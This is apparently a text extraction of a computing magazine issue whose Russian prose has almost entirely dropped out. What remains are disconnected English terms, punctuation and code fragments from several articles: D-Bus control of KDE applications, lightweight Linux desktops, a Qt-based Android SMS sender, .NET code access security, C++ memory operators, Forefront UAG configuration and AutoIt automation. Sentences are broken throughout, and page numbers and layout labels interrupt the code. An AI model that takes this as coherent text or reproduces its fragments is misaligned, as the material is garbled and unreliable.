,
D-Bus
.

WARNING
warning

dbus: UUID
file /var/lib/dbus/
machine-id contains
invalid hex data,

:
$ dbus-uuidgen >
/var/lib/dbus/
machine-id

HTTP://WWW
links
www.freedesktop.
org D-Bus
dbus.freedesktop.
org/doc/dbus-tutorial.
html
D-Bus
xmms2.org/wiki/
MPRIS#D-Bus
XMMS-2 D-Bus
dkws.org.ua

then
in='qdbus org.kde.klipper /klipper \
getClipboardContents'

097

UNIXOID

dbus-send --type=method_call --dest=org.kde.amarok \


/Player org.freedesktop.MediaPlayer.Stop
sleep 5
dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Play

:
$ qdbus org.kde.amarok /Player GetMetadata

/yakuake/sessions

GetStatus, 4 :
: 0 , 1 , 2 ;
: 0 , 1
;
: 0 , 1 ;
: 0 ,
, 1 .


VLC XMMS
wget $in
fi

in,
wget, .
, . , FTP-. -,
URL ,
, http://server/file,
. (FlashGet ,
-, URL), URL,
wget. , D-Bus
, .
getClipboardContents setClipboardContents,
.
:

if qdbus org.kde.klipper /klipper getClipboardContents |


egrep -q '^(http://)'
then
qdbus org.kde.klipper /klipper setClipboardContents
" URL "


AMAROK 2 D-BUS
Play, Pause, Next,
Prev, Stop, Quit:
$ dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Play
$ dbus-send --type=method_call --dest=org.kde.amarok \
/Player org.freedesktop.MediaPlayer.Pause
...
$ dbus-send --type=method_call --dest=org.kde.amarok \
/ org.freedesktop.MediaPlayer.Quit

VLC.
, :
$ dbus-send --print-reply --session --dest=org.mpris.
vlc /Player org.freedesktop.MediaPlayer.Play

Linux, - XMMS.
Winamp.
D-Bus XMMS
(XMMS 2): http://xmms2.org/wiki/MPRIS#D-Bus.
XMMS 2, .

ORG.FREEDESKTOP.
MEDIAPLAYER (MPRIS 1.0 DBUS API)
, Amarok, VLC, XMMS, Audacious,
BMPx, MPRIS. ,
, . dbus-send
'--dest' :
$ dbus-send --type=method_call --dest= \
/Player org.freedesktop.MediaPlayer.Play

.
org.freedesktop.MediaPlayer /Player. /TrackList.


VolumeSet:
$ dbus-send --type=method_call --dest= \
/Player org.freedesktop.MediaPlayer.VolumeSet

0100. 0 , 100 . :
$ qdbus org.kde.amarok /Player VolumeSet 90

VolumeGet.
, Amarok2 Last.FM,
Stop Play.
:
#!/bin/bash

098

?

D-Bus
Linux-. X 09 /140/ 10

, ,
. ,
D-Bus.
yakuake ( KDE,
<F12>) :

-Bus

$ qdbus org.kde.yakuake
/KDebug
/Konsole
/MainApplication
/Sessions
/Sessions/1
/yakuake
/yakuake/MainWindow_1
/yakuake/sessions
/yakuake/tabs
/yakuake/window

org.kde.yakuake.
, , ,
. :
qdbus

:
$ qdbus org.kde.yakuake /yakuake/tabs

,

. KDE DCOP (Desktop COmmunication Protocol),
D-Bus. DCOP
CORBA, SOAP XML-RPC.
CORBA , SOAP XML-RPC
-.

qdbusviewer
/yakuake/tabs.
, setTabTitle() .

. ,
/yakuake/sessions:
$ qdbus org.kde.yakuake /yakuake/sessions

()
activeSessionId(). (
yakuake ), :
$ qdbus org.kde.yakuake /yakuake/sessions \
activeSessionId

:
qdbus

, :


Kopete
, Kopete:
$ dbus-send --type=method_call --dest=org.kde.kopete \
--print-reply /Kopete org.kde.Kopete.contacts
:
$ dbus-send --session --type=method_call \
--dest=org.kde.kopete \
/Kopete org.kde.Kopete.disconnectAll

D-Bus
:
$ dbus-send --dest=org.kde.ksmserver /KSMServer \
org.kde.KSMServerInterface.saveCurrentSession
, :
$ qdbus org.kde.ksmserver /KSMServer logout 0 2 0
( root'):
$ dbus-send --system --dest=org.freedesktop.Hal \
--type=method_call --print-reply \
/org/freedesktop/Hal/devices/computer \
org.freedesktop.Hal.Device.SystemPowerManagement.
Shutdown

X 09 /140/ 10

#!/bin/bash
id=`qdbus org.kde.yakuake /yakuake/sessions
activeSessionId`
echo $id
qdbus org.kde.yakuake /yakuake/sessions setTabTitle \
$id " "

. , ,
( )
:
#!/bin/bash
id=`qdbus org.kde.yakuake /yakuake/sessions
activeSessionId`
qdbus org.kde.yakuake /yakuake/sessions setTabTitle \
$id $1

D-Bus ,
qdbusviewer qt4-dev-tools,
D-Bus.
.
D-Bus, http://dbus.freedesktop.org/doc/dbus-tutorial.html. ! z

099

UNIXOID
Adept adeptg@gmail.com



. 7-10-
, .
,
, .
.

,
,
: ,
. .
,
:).
,
384
( CPU ,
400 ). ,
Firefox 384
.
, IM 512
1024 .
XXI :
: Intel Pentium-III 800 ;
: 128 SDRAM;
: 8
;
HDD: 20 .

100


,
,
. ,
, .
.

DE .
,
DSL (Damn Small Linux).
, .

2.4 .

: xubuntu (
-) lubuntu. Xubuntu Ubuntu Xfce Gnome (Abiword+Gnumeric
Openoffice, Thunderbird Evolution,
). xubuntu

192 (
256 ).
, 128 ( )
xubuntu - ( Live) ,
. -
:). 681 ,
2 .
Ubuntu .
Lubuntu
Ubuntu LXDE Gnome .
OpenOffice
Abiword+Gnumeric, Firefox
Chromium ( , Xubuntu
).
beta,
2010 ( Ubuntu 10.10). Lubuntu
,
-
X 09 /140/ 10

Antix

128 ( Live-,
). 521 ,
1,5 .
Antix
SimplyMEPIS
Debian Testing.
PII 266 64 ( 128 ). ,
128 . : full
(485 ) base (264 ). full- 1,5 . 8.5,
. DE IceWM ( fluxbox,
wmii dwm ).
,
.
( debian-multimedia)
.

puppy ( top10 distrowatch).
Lucid Puppy 5.0
( Ubuntu Lucid Lynx), 4.x (
4.3.1)
4.4. ISO 5.0.1 130 ,
500 . ,
: abiword,
sylpheed, inkscape, gxine ( ), geany
.
, (
:)).
PuppyBrowser, Firefox. ,
,
(, ).
128 ,
Live-, swap.
C
JWM. puppy LiveCD
.
Slitaz . 1.0
2008. ,
3.0. ISO: 30 (, DSL!).
( 1,5 ).
Openbox, LXPanel.
30- LiveCD Firefox, gFTP,
transmission, mplayer, leafpad
. HTTP (lighttpd) SSH
X 09 /140/ 10

LXDE + Ubuntu = Lubuntu

(dropbear) . ,
(, , ).
LiveCD 192 , 128
. ,
, LiveCD:
slitaz-loram ( 80 ) slitazloram-cdrom ( 16 ).
Tiny Core Linux .
10- .
FLWM FLTK. ,
: , - .
. , ,
cfdisk, , grub.
Tiny core 64 . ,
. . ,
.

, .

HAND MADE

. :
DE
. , :).
DE LXDE Enlightenment (,
Xfce ) LXDE
. , Ubuntu LXDE :
$ sudo apt-get install lxde

, lubuntu (, - lubuntu
ppa-). Enlightenment
Ubuntu ( 10.04 E16, 10.10
E16, E17) :
$ sudo apt-get install e16

$ sudo apt-get install e17

DE

DVD
dvd


:
tiny core, slitaz, puppy.

INFO

info
avahi

zeroconf,


.
kerneloops-daemon ,


kernel oops'


kerneloops.org.

HTTP://WWW
links
www.xubuntu.org
lubuntu.net
antix.mepis.org
puppylinux.org
tinycorelinux.com
www.slitaz.org

101

UNIXOID

Puppy LinuxPreload



conky. (
),
. :
$ sudo apt-get install conky

~/.conkyrc. , .conkyrc
. .conkyrc
: http://conky.sourceforge.net/screenshots.
html.

GDM. ,
.
:
;
;
;
;
, ,
.



. :
metacity, compiz kwin openbox, fluxbox, IceWM JWM. openbox - , (ObConf) :). ,
, openbox .
- . ,
( , ),
,
. , ,
, . , DE
: gnome-session, lxsession, xfce-session.
staybox,
openbox ( *box ). ,
, . , , lxsession
( LXDE). Openbox , ,

102

,
. , , ,
: tint2, pypanel, fbpanel, lxpanel .
: , , , , .
LXPanel. : (
, , ),
( , Gnome ),
.
, ( )
( iDesk,
http://idesk.sourceforge.net), .

. :
pcmanfm, thunar, rox-filer, emelfm2, xfe, gentoo (
:)). pcmanfm ,
, ( ), , .

.
Gnome-terminal - : terminator, termit,
lxterminal, sakura. :
UTF8 . lxterminal.
, .
, , dillo, midory arora

: . chromium.
(
, , nano mc). leafpad
, abiword odt doc, gnumeric ods xls.
geany.
Eye
of GNOME, , ,
: geeqie ( gqview), ristretto, mirage
. geeqie.
network-manager wicd, file-roller xarchiver,
. ,
gdm.
- , , slim (Simple Login
Manager) .


. .
. Ubuntu, , , . , :
X 09 /140/ 10

Slitaz

10

?

.
, . ,
.
,
.
framebuffer' ,
gpm .
:
: lynx ( ), w3m (
, cookie ), links ( 2 framebuffer);
: mutt, alpine;
IM: finch ( , Pidgin),
CenterIM ( . 5.0
libpurple), irssi (IRC-), mcabber (jabber);
RSS-: newsbeuter, snownews;
: fbi ( fbgs ,
PDF PostScript), fbv, zgv;
: ogg123, mpg123, mpg321, mpd, moc,
mp3blaster;
: mplayer, vlc.

$ sudo apt-get install slim openbox obconf lxpanel \


pcmanfm lxterminal chromium-browser leafpad \
abiword gnumeric geany geeqie wicd xarchiver

, login manager .
slim.
apt-get,
, , avahi-daemon kerneloops-daemon. Sane
cups ( , )

:
$ sudo /etc/init.d/cups stop
$ sudo update-rc.d -f cups remove

. login manager . Slim


( <F1> ),
X 09 /140/ 10

- :
openbox . lxsession
~/.xsession:
$ nano ~/.xsession
lxsession -session default

lxsession , ,
/etc/xdg/lxsession/default/desktop.conf :
$ sudo nano /etc/xdg/lxsession/default/desktop.conf
[Session]
window_manager=openbox-session

, lxsession ,
/etc/xdg/lxsession/default/autostart:
$ sudo nano /etc/xdg/lxsession/default/autostart
@lxpanel
@pcmanfm --desktop

@ , lxsession .
'--desktop' , (
) pcmanfm. ,
, GUI:
$ pcmanfm --desktop-pref

.config/pcmanfm/pcmanfm.conf.
pcmanfm
.
lxterminal openbox gnome-terminal,
:
$ sudo update-alternatives --config x-terminal-emulator

lxterminal .

,
, , ,
, . ,
. z

103

CODING
RankoR ax-soft.ru

SMS-

ANDROID

OS Android , , , ,
Qt. ,
, ,
SDK Java. Trolltech
Nokia .

NDK C++, , ,
, Qt Android.
- ( ) . , ,
.

, .
Java NDK , .so. Java,
, ,
Qt. Android Java-, , ,
.

QT

Wiki (. ),
, -
.
Ubuntu 10.04,
, , .

104

, ,
( , ?).
, :
SDK. :
wget http://android-lighthouse.googlecode.com/files/
qadk-1.x-2.x-rtti-exceptions.tar.lzma
tar xvfa qadk-1.x-2.x-rtti-exceptions.tar.lzma

Lighthouse:
git clone git://gitorious.org/~taipan/qt/androidlighthouse.git

mkspecs/android-g++/qmake.conf.
NDK_ROOT ANDROID_PLATFORM ( /data/local/qt
android-5 ).
.
androidconfig.sh. shared
static ( ).
, (./androidconfig.sh) (make -j X, X
).
X 09 /140/ 10

>> coding

DVD
dvd

.

Qt logo

http QHtpp
done() readyRead().
GET- :

? - ! ,
, Ubuntu make ,
OpenGL.
,
,
OpenGL.
make -j X , ,
Android
, =).

Qt Creator, GUI-.
(, .pro)
. :
TEMPLATE = lib
CONFIG += dll
Qt Creator
() qmake /data/local/
qt/bin/qmake.
,
.
, ,
?
. smste.ru, .
, , Wireshark.
:
1. GET ,
input (, hidden),
.
2.
.
3. POST- .
HTTP- Qt QHttp.
, QtNetwork (QT +=
network) !
( )
.
X 09 /140/ 10

http.setHost("smste.ru");
http.get("/");

done(), ,

(, Wi-Fi).
onHttpReadyRead(const QHttpResponseHeader
&resp):

HTTP://WWW
links
http://code.google.
com/p/androidlighthouse Qt for
Android .
http://developer.
android.com/sdk/
index.html Android
SDK, must have!

QString str(http.readAll());
qint32 index=str.indexOf("value=\"code")+7;
if ( index != 6 )
codeMod = str.mid(index,
str.indexOf("\" />", index) - index);

(hidden)
codeMod . :
QString cookieStr;
for ( qint8 i = 0;
i < resp.values().count(); i++ )
{
if ( resp.values().at(i).first ==
"Set-Cookie" )
cookieStr.append(
resp.values().at(i).second+'\n');
}
cookies = QNetworkCookie::parseCookies(
cookieStr.toAscii());

, , , , ,
. cookies QList QnetworkCookie.
qint32 index =
str.indexOf("<image>/pix/") + 12;
image = str.mid(
index,str.indexOf(".jpg") - index
);
QHttpRequestHeader header = createHeader(
"GET",QString("/pix/%1.jpg").arg(image)
);
http.request(header);

INFO

info


.
,
?

WARNING
warning
,
?
,

, QtWebkit
Phonon,


LGPL.

(
) JPEG.

105

CODING

HTTP-
QHttpRequestHeader MainWidget::createHeader(
const QString &method,
const QString &path
)
{
QHttpRequestHeader header(method, path);
header.addValue("Host", "smste.ru");
header.addValue("Connection", "keep-alive");
header.addValue("User-Agent", "Mozilla/5.0");
header.addValue("Referer", "http://smste.ru");
header.addValue("Accept", "*/*");
QString cookie;
for ( qint8 i = 0; i < cookies.length(); i++ )
cookie += ( cookies.at(i).toRawForm(
QNetworkCookie::NameAndValueOnly) + "; ");
header.addValue("Cookie", cookie);
return header;


createHeader()
HTTP- (, ,
).
,
:
QHttpRequestHeader header = createHeader("POST",
"/");
header.addValue("", QString("number=%1&
message=%2&sign=ax-soft.ru&event=%3&
codemod=%4&%5=%6").arg(ui->numberLE->
text()).arg(ui->textPTE->toPlainText()).
arg(image).arg(codeMod).arg(codeMod).arg(
ui->captchaLE->text()));
qDebug() << header.toString();
http.request(header);

! Build All, .apk- :).


:
if ( resp.value("Content-Type") == "image/jpeg") {
ui->captchaLb->setPixmap(QPixmap::
fromImage(QImage::fromData(
http.readAll())));
return;
}

, .
,
, ,
ui->numberLE. :
void MainWidget::on_numberLE_editingFinished()
{
if ( ui->numberLE->text().length() != 11 )
return;
QHttpRequestHeader header = createHeader(
"GET",
QString("/netxml.php?number=%1&rnd=94728").
arg(ui->numberLE->text()));
http.request(header);
}

106

. , , Java Runtime Environment?


, , . , .apk ant. sudo apt-get install ant.
tools Android SDK ./
android. .
API ( ,
8), Virtual
Devices, New. Name , Target Android 2.2,
Skin ( WVGA800), Create AVD.
Start, Launch. , .
,
1,5-2 . , ( ARM QEMU).
, ,
100% .
Android, .

tools Android SDK ( ).


, . : ./android create project.
, ! , . , , : . API,
X 09 /140/ 10

>> coding

SUCCESSFUL,
.

, , Activity
. :
./android create project --target 8 --name hello
--path ./TestPro --activity helloActivity --package
com.example.hello

ls , TestPro. ,
ls. libs armeabi. Qt
(.so).
src/ androidlighthouse/src/android/java/com, src/com/nokia/
qt. src/com/example/hello/
Activity helloActivity.java. onCreate,
:

- ( 2007, 2008) (Motorola


A1200e, Linux, , , ,
Qt 2) QTopia, Qt
Embedded Trolltech Linux Kernel 2.6
Qt 4, .
motofan, 2.4 ( A1200
, ). , ,

, !
, Qt 4.5 (
, , Maemo).
Android, . ,
, Qt Mobility,
Nokia. , , (,
?). , Qt
iOS (, , ),
, Qt Software .
Qt Everywhere!

THANKS TO:

taipanromania ( ) marflon
(, , ][) .apk, , , -3-1 ( ) . z

qt

public helloActivity()
{
setApplication("Hello");
}

Hello . , .so
libHello.so.
, , ant
install. (, .
, 12.5 ). ,
X 09 /140/ 10

107

CODING
stannic.man@gmail.com


,
.
,
, ? , ,
? ?

.NET ,
C# .

, . , ( )
.
.
(common language runtime, CLR)
.NET Framework ,
,
. ,
(principal-based security), CLR , , , ,
.
(code access security) , ,
(trusted user) ,

108

.
System.Security. , ...
, , , ,
.NET
. System.Security
. :).

, ( ) . , : .

CLR?

(common language runtime, CLR)


Microsoft .NET Framework
evidence-based security.
. ,
, ,
, ,
, ,
X 09 /140/ 10

>> coding

,
.
:
(evidence-based security)
, ;
(code access security)
, - .

.
,
, , .
- ,
.
(custom) . ,
,
, .
.
.NET Framework (Mscorcfg.msc).

: ,
. , , - , ,
. ,
,
,
, .
, ,
. ,
.

,
, , , .

IHRE AUSWEISS, BITTE!


, ( ) ,
,
. .NET Framework
(, Microsoft Internet Explorer). :
(, C:\app.exe)
. ,
,
,
. ,
, , ,
. , ,

X 09 /140/ 10

Mscorcfg.msc
Windows, , UAC, DEP, ,
.
(, http://www.microsoft.com).

,
. ,

,
:
WebPermission ,
;
FileDialogPermission , ;
IsolatedStorageFilePermission ,
-;
UlPermission
.
( \\UNC\share).
,
, , :
FilelOPermission
, ;
WebPermission , ;
DNSPermission DNS-
IP-;

DVD
dvd

,
C#
, .

HTTP://WWW
links
blogs.msdn.com,
www.eggheadcafe.
com, bytes.com


.NET

109

CODING

FileDialogPermission , ;
Isolated StorageFilePermission ( );
UlPermission
.
,
.
. ,
: , -, .
,
. ,
, .
, , , .

. :
, ,
, , ,
. .
, ,
. , ,
DLL, ,
, ,
, , .
,
(, ,
) , .
,
:
,
( ). . , -
, -,
, . ,
protected , .
( ).
, .
. InheritanceDemand

:
;
, .


GuiCaspol

?
.NET Framework
, .
, , . , ,
. :
[Security Permission]:
Unmanaged Code , ;
Skip Verification ;
ControlEvidence
;
ControlPolicy ;
SerializationFormatter ;
ControlPrincipal
;
ControlThread ,
;
[ReflectionPermission]:
MemberAccess ( ).

110

, , .
1. sn -k .
, (strong
name), .
, .
sn -k keypair.dat
csc/r:App1.dll /a. keyfile: keypair.dat App1.cs
sn -p keypair.dat public.dat
sn -tp public.dat >publichex.txt
[StrongNameldentityPermissionAttribute ( SecurityAction
. LinkDemand , PublicKey="...hex...",Name="App1",
Version="0. 0.0.0")]
public class MyClass

2. esc Appl,
.
3. sn .
4. . (custom attribute)

, sn, PublicKey.
X 09 /140/ 10

>> coding


5. Appl
MyClass.
API-
LinkDemand.
, , ( ). ,
, .
. , ,
(link demands) .
[System.Security.Permissions.
PermissionSetAttribute(System.Security.
Permissions.SecurityAction.InheritanceDemand,
Name="FullTrust")]
[System.Security.Permissions.PermissionSetAttribute
(System.Security.Permissions.SecurityAction.
LinkDemand,
Name="FullTrust")]
public class YourClass{...}

.
, , ,
, . :
[assemblyiFilelOPermissionAttribute
(SecurityAction.RequestMinimum,
X 09 /140/ 10

Wrlte="C:\\test.tmp")]
[assembly:rmissionSet
(SecurityAction.RequestOptional. Unrestricted=false)]
... SecurityAction.RequestRefused ...

, ,
C:\test.tmp.
, PolicyException, .
, ,
- .
, ,
. ,
.
, , -
, , ,
. , , , . , ,
.
.

!
.
, , . , ,
.
, !z

111

CODING
deeonis deeonis@gmail.com

C++

C++.

new delete. ,
C++
.
,
new delete ,
. new
.
, , ,
- .
, new delete
C++ .
- new.
. , new

. ,
. ,
.

. , C++
.
.
, new:
new
void *operator new(std::size_t size)
throw(std::bad_alloc)
{
using namespace std;
// 0 ,
// , 1
if (size == 0)
size = 1;
while(true)
{
// size ;


new

new . . - ,
bad_alloc.
, . new
-,
. ,
. ,
, . , - ,
,
. ,

112

if ( )
return ( );
//
// , -
new_handler globalHandler = set_new_handler(0);
set_new_handler(globalHandler);
if (globalHandler)
(*globalHandler) ();
else
throw std::bad_alloc();
}
}
X 09 /140/ 10


, . , , .
, ,
0 , .
, .
new . ,
-. , ,
, bad_alloc.
, new
-.
, :
, ,
bad_alloc, ,
. ,
new, .
, new - .

. , new Base
sizeof(Base) , .
, , Base?

new, Base. (
Derived), , :
sizeof(Derived) != sizeof(Base). -
new . , ,
.
new
class Base {
public:
static void *operator new (std::size_t size)
throw(std::bad_alloc);
...
};
// new
class Derived: public Base
{...};
// Base::operator new
Derived *p = new Derived;

, .
, new, .
Base,
new. ,
.
new
void *operator new (std::size_t size)
throw(std::bad_alloc)
{
// size , new
X 09 /140/ 10

if(size != sizeof(Base))
return ::operator new(size);
//
...
}

new
(operator new[]). ,
. - . ,
, ,
, new[]. (
)/sizeof(Base). ,
, ,
.


delete

delete, .
, . delete
:

delete
void *operator delete (void *rawMemory) throw()
{
// ,
if(rawMemory == 0) return;
// ,
rawMemory;
}

delete - , ,
new,
. new Base
sizeof(Base) , delete
. , ,
,
delete.
- delete
class Base {
public:
static void *operator new (std::size_t size)
throw(std::bad_alloc);
static void *operator delete
(void *rawMemory, std::size_t size) throw();
...
};
void* Base::operator delete (void *rawMemory,
std::size_t size) throw()
{

113

CODING

// ,
if(rawMemory == 0) return;
if (size != sizeof(Base)) {
::operator delete(rawMemory);
return;
}
// ,
rawMemory;
}

new
delete

operator new, ,
new .
void*.
, new :
void *operator new(std::size_t, void *pMemory).
new
.
delete

.
,
- .
: widget *pw = new Widget. .
new,
Widget, .
, ,
, *pw . !
. ,
C++. delete
.
, . C++ delete,
new,
. new
delete, , new
delete,

.

class Widget {
public:
...
static void *operator new(std::size_t size,
std::ostream& logStream) throw(std::bad_alloc);
static void *operator delete(void *pMemory,
std::size_t size) throw();
...
};
Widget *pw = new (std::cerr) Widget;

114

delete
, new . operator
delete C++.
:

class Widget {
public:
...
static void *operator new(std::size_t size,
std::ostream& logStream)
throw(std::bad_alloc);
static void *operator delete(void *pMemory,
std::size_t size)
throw();
static void *operator delete(void *pMemory,
std::ostream& logStream)
throw();
...
};
Widget *pw = new (std::cerr) Widget;

,
delete.
, ,
.
.
- new,
.

class Base {
public:
static void *operator new (std::size_t size,
std::ostream& logStream)
throw(std::bad_alloc);

};
// ! new
Base *pb = new Base;
// , new Base
Base *pb = new (std::cerr) Base;

, -,
using-.

C++ ,
.
! z
X 09 /140/ 10

SYN/ACK
grinder grinder@synack.ru


FOREFRONT UAG
. ,
, .
Forefront UAG
.
FOREFRONT UAG
Forefront Unified Access Gateway (UAG)

.

, Microsoft,
. Intelligent
Application Gateway (IAG 2007),
UAG, , : Remote Desktop Services, SharePoint Exchange (Outlook Web
App Anywhere), Dynamics CRM, Citrix XenApp,
.
,
: , , ,
..
UAG, NAP, NPS- (. NAP & NPS).
UAG :
(publishing server) ;
DirectAccess
; VPN,
, ;
( ),
.
, UAG ,
DirectAccess. , ,
, Win2k3 ,
-Windows .
. DirectAccess
Win7 Win2k8R2, UAG SSL VPN
XP/Vista, *nix/Mac OS X . UAG
, , ,
.
NLB (Network Load Balancing) UAG,
(master), . UAG
NLB, Win2k8R2.
,

116

go.microsoft.com/
fwlink/?LinkId=166184.

(trunks). ,
.
IP .
, Forefront UAG
,
. UAG : LDAP, RADIUS, TACACS, SSL, WINHTTP.
UAG (Single Sign-On)
, .
UAG
, Kerberos, NTLM, HTTP. . AD Active Directory Federation
Services (AD FS).
, UAG Forefront TMG (Threat
Management Gateway, ,
). , . , UAG
TMG.

FOREFRONT UAG
CPU 2,66+ , 8+ RAM
( 4
RAM), NIC 2+. Win2k8R2
Standard Enterprise. 64-, , , .
,
.
.
-, 120 .
, Uagver.exe ( ISO).
,

TechNet, , UAG.
X 09 /140/ 10

Run Windows Update


.
Install Forefront UAG,
Setup Wizard. , ,
Next.
,
( Forefront).
,
TMG UAG. Forefront UAG
Management. Getting Started
Wizard, ,
. Configure Network Setup

. Unassigned Internal External
.
Define server Topology UAG (Single server) (Array member).
,
Single server. , , Join Microsoft
Update ,
Microsoft Update .
,
.

FOREFRONT UAG
.
, UAG, .
UAG ,
HTTP/HTTPS-
DirectAccess.
( ISA/TMG ),
, Outlook Web App, IIS, RDS,
Citrix XenApp .
HTTPS- Certificate Manager,
(
VPN, ][ 08.2008).
SSO Kerberos.
, ,
UAG ,
Admin.
. , Admin (Authentication and
X 09 /140/ 10

Authorization Servers), NPS,


(Load Balancing), SSL
(SSL Protocol Settings), (File Access) .
: New Trunk
.
. Portal trunk,
UAG.
Active Directory, ADFS trunk. Publish Exchange applications via the portal
Exchange.
( ),
, ,
IP-/. HTTP-
HTTPS-,
. : , ,
Add, . , .
5 (Forefront UAG access policies) NAP ( NAP
). UAG ,
, .
,
. HTTPS-,
.
, ,
UAG. ,
.
.
Configure Trunk Configuration.
, ,
, URL, . ,
. Portal URL, URL,
(, ).
,
URL.
URL Inspection URL (POST, GET, PUT, DELETE ..),
POST/PUT, ,
URL.

117

SYN/ACK

Forefront UAG

Forefront UAG 2010 Best Practices


Analyzer Tool

URL Set, .
Accept
Reject (URL, , ).
Primary () Exclude (
Primary).
Global URL Settings ,
, URL Set.
UAG.
Add Application ,
. .
: Built-in services ( , -), Web
(Exchange, SharePoint, Dynamics CRM ..), Client/server and legacy,
Browser-embedded (Citrix XenApp), Terminal services (TS)/Remote
Desktop Services (RDS). , (. ).
.
, , .
TMG.
,
, TMG: , .

fwlink/?LinkId=169486).
AD,
, ,
DirectAccess.
(AutoEnrollment), .
Certification Authority, Manage > Certificate
Templates Workstation Authentication.
, DirectAccess, Autoenroll
Enroll. GPO
(DirectAccess IPsec Certificate AutoEnrollment), Computer
Configuration > Policies > Windows Settings > Security Settings
Public Key Policies > Certificate Services Client >
Autoenrollment.
Renew expired certificates Update certificates that use
certificate templates. Security Filtering ,
DirectAccess, ,
, .
DNS-.
, ][ 11.2009,
GPO DNS-
, DirectAccess.
Computer Configuration Policies Administrative Templates

DIRECTACCESS
DirectAccess
, UAG IAG 2007, . , Forefront UAG
DirectAccess prerequisites, ,
, . ,
,
,
IPv4- ( go.microsoft.com/

NAP & NPS

Network Access Protection , , .


Network Policy Server ,
RADIUS-, RADIUS- NAP.

118

, ,
UAG ,
,
.
. , , UAG. Forefront UAG 2010
Best Practices Analyzer (BPA) Tool,
Microsoft. , BPA ,
,
. , , BPA,
. Forefront TMG Forefront TMG BPA Tool.
X 09 /140/ 10

INFO

info
Forefront
TMG

][
09.2009
NAP

][
12.2008


VPN ][
08.2008

Forefront UAG
Network, DNS Client Primary DNS Suffix, DNS-
. DirectAccess UAG.
DirectAccess
.
DirectAccess, .
.
, Active Directory,
,
DirectAccess.
,
. ,
Enable UAG DirectAccess NAT64
Enable UAG DirectAccess DNS64.
( HTTPS),
. , ,
Infrastructure Servers Configuration
,
.
DNS- .
, ,
.
Application Servers,
. Generate Policies,
, ,
Apply Now, .
, gpupdate /force.

.
,
, Admin
. Web Monitor ( 5002), X 09 /140/ 10

(, , ),
,
.
Activation Monitor,

UAG ,
, ,
.

, , UAG
.
. , ,
. , MS, . z



Forefront
UMG ,

Uagver.exe


,
UAG.

HTTP://WWW
links

Forefront
UMG www.
microsoft.com/
forefront/unifiedaccess-gateway

UAG, Forefront TMG

119

SYN/ACK



OC Windows
.
, . , , .
.
AUTOIT

AutoIt (autoitscript.com/autoit3),
, ,
GUI-.
AutoIt,
BASIC- . , Windows API DLL, , ,
(, , ), GUI, ,
, (MySQL SQLite),
HTML-, , -mail .
, . , AutoIt .
, .
, AutoIt
Windows. , AutoIt ,
.
Windows 95 2k8,
64- , UAC. ,
exe
.
.
AutoIt freeware-,
, . , -
. 3, , .
SciTE4AutoIt3,
AU3Check.exe, , Aut2Exe ( Exe2Aut) . *.au3
AutoIt.
, AutoIt
. . ,
, :
Run("calc.exe")

120

, . AutoIt
,
. ,
WinWaitActive,
. .
. ,
AutoIt AutoIt v3.3.6.1.5,
, :
WinWaitActive("AutoIt v3.3.6.1.5")

.
, ,
, :
WinWaitActive("AutoIt v3.3.6.1.5", "License Agreement")

.
:
Send("!y")

, .
AutoIt Window Info Tool (AU3Info.exe),
,
( ), , ,
. ,
Window Info Tool .

. AutoIt ,
.
.
. AutoIt ,
, ,
, .
X 09 /140/ 10

XSTARTER

. ,
(xstarter.com/rus), , xStarter , .
xStarter ,

Windows.
,
, . , ,
,
. , . xStarter,

. ,
,
<Ctrl+D>, , Firefox.
,
. /
, , .
.
( ),

. . ,
,
, ,
,
.
.
.
, ,
.
, ,
, . .

xStartHooks. xStarter

, ,
.
(, NOD32) ,
xStarter .
X 09 /140/ 10

exe-,

.
.
, Windows NT4
2k8/7.

, , SMS e-mail,
.
Starter Job Scheduler for
Firebird/Interbase, SQL-,
. ,
xStarter
Web Pilot.

AUTOMATE
, AutoMate,
Network Automation, Inc (networkautomation.com). GUI, .
Task Builder.

, .
AutoMate 7 230 ,
, ,
FTP/SFTP, PGP, , WMI .
AutoMate ,
: AutoMate Professional Premium,
AutoMateBPAServer 7 Standard Enterprise.
AutoMate Professional . Enterprise

, AD,
, SNMP,
telnet .
Win XP SP2 2k8/7. Microsoft .NET Framework 3.0.

121

SYN/ACK

AutoIt AutoIt Windows


Info
Task Builder Task Administrator. Task Builder .
: 29
.
, . , ,
. System > Get Volume Information,
, .

. General ,
: , , , . ,

AutoHotkey

AutoHotkey (autohotkey.com)
AutoIt v2. , ,
AutoIt , , 2003 Initial release.
, AutoHotkey
GNU GPL.
AutoIt v2,
v3. : , ,
. , ,
GUI.
.
AutoHotkey . , <Win+C>, :
#c::Run calc
# <Win>.
(
www.script-coding.info/AutoHotkeyTranslation.html),
. , GUI
SmartGUI Creator SciTE4AutoHotkey,
.
( *.ahk) exe .

122

xStarter ,

(All volumes) ,
, .
, ,
.
.
.
, , ,
, , .
Actions.
(Breakpoint,
<F8>).
, ,
, Task Administrator. , ,
. , ,
, , .
, .
*.aml.

Firefox
AutoIt

AutoItSetOption ( "WinTitleMatchMode", 2 )
AutoItSetOption ( "WinDetectHiddenText", 1 )
WinMinimizeAll ( )
Sleep ( 1000 )
Run ( "FirefoxSetup3.6.6.exe" )
WinWait ( " Mozilla Firefox" )
Send("{ENTER}")
WinWait ( " Mozilla Firefox", " ")
Send("{ENTER}")
WinWait ( " Mozilla Firefox", "" )
Send("{ENTER}")
WinWait ( " Mozilla Firefox", " " )
Send("{ENTER}")
Exit
X 09 /140/ 10

INFO

info


Win2k8R2
Se7en.

AutoMate
,
NASA, IBM, Intel,
Verizon, Kaiser,
Safeway Stores
.

HTTP://WWW
AutoMate 7
AUTOMATION ANYWHERE
Tethys Solutions,
LLC (automationanywhere.com)
-. Automation Anywhere

,
, , . ,
.
, ,

links
AutoIt
autoitscript.com/
autoit3
AutoMate
networkautomation.
com

xStarter xstarter.
com/rus

Automation Anywhere
automationanywhere.com
AutoIt www.
autoitscript.ru

Automation Anywhere

123
X 09 /140/ 10

SYN/ACK

,
VBS JavaScript . ,
SMART Automation Technology, .
,
. , ,
. : Object Recorder
Web Recorder -. Web Recorder , : Java, JavaScript,
AJAX, Flash, . : Automation

Windows

Microsoft , , Vista, Task Scheduler (


, taskschd.msc) .
, ( )
. ,
(Triggers), (Actions), (Conditions) (Settings). ,
:
, , , .
, ,
.
,
, ( ,
).
,
(, ). , , .

Win2k8

124

AutoHotkey

Anywhere, ,
. <Alt+Ctrl+S> Stop
. ( *.atmn). ,
